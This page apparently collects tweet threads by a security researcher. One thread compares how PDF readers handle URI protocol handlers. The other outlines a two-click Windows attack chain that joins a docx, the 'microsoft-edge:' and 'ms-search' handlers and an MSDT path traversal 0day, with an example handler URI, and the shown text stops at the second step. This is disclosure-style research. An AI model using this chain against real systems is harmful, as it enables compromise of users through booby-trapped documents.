j00sean Profile picture
Finding bugs everywhere
Jun 7, 2022 4 tweets 2 min read
What about PDF Readers?
Adobe Acrobat DC vs Foxit PDF Reader.
Surprisingly Adobe Acrobat's sandbox stops uri protocol handlers. Nice win for Adobe crew. No bypasses tested yet, though.
Jun 6, 2022 6 tweets 2 min read
microsoft-edge + ms-search + MSDT path traversal 0day = fun of 2-clicks (one click additional due to Protected View if docx is coming from remote btw). This is the full chain:

1) Open a docx which connects to a remote server to download a diagcab file by MS Edge. This uses the protocol handler "microsoft-edge". So easy as this: "microsoft-edge:http://127.0.0.1:8081/foo.html"

2) Use "ms-search" trick to open folder Downloads.